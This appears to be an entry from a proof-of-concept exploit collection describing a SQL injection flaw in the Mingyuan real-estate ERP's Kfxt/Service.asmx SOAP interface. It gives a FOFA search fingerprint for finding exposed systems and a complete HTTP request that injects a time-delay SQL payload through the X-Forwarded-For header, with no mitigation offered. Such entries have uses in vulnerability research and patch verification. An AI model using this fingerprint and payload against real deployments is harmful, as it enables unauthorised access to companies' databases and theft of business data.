adysec_POC/wpoc/明源云/明源地产ERP接口Service.asmx存在SQL注入漏洞.md
2025-03-07 18:18:50 +08:00

41 lines
2.1 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 明源地产ERP接口Service.asmx存在SQL注入漏洞
某源地产ERP是一款专门为房地产行业设计的企业资源规划ERP系统旨在帮助房地产企业实现全面的信息化管理提高运营效率和管理水平。系统涵盖了项目管理、财务管理、供应链管理、客户关系管理CRM、人力资源管理等多个核心功能模块通过整合企业的各个业务环节实现信息的统一管理和高效协同。该系统在房地产行业具有高度的专业性和适用性能够满足不同规模和类型企业的需求。适用于各种规模和类型的房地产企业特别是需要进行项目管理和资金管理的企业。无论是大型企业还是中小企业都可以从某源地产ERP系统中受益。例如大型企业可以利用系统的全面性和集成性实现复杂的业务流程管理和数据分析而中小企业则可以根据自身需求选择适合的功能模块优化资源配置提高运营效率。
## fofa
```javascript
body="/_common/scripts/md5-min.js"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qQQRNkEo8NMwRQ021eRZBqBuKH0CuQ7uEILDKfLck9mxaJjR8m82DzflBlIciaUThm2oe1chjiaaSg/640?wx_fmt=png&from=appmsg "")
## poc
```javascript
POST /Kfxt/Service.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:4'--
SOAPAction: "http://www.mysoft.com.cn/queryProjects"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <queryProjects xmlns="http://www.mysoft.com.cn/">
      <inpXML>&lt;xml&gt;&lt;buname&gt;abc&lt;/buname&gt;&lt;/xml&gt;</inpXML>
    </queryProjects>
  </soap:Body>
</soap:Envelope>
```
延时
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qQQRNkEo8NMwRQ021eRZBqtia5diaMouyFgIhPoUNLYEOxj9HXAjYV7XWuHACmMwG3xCQHvAczsGHQ/640?wx_fmt=png&from=appmsg "")
## 漏洞来源
- https://mp.weixin.qq.com/s/iUv6iV71vh_6uBLZpyJX0Q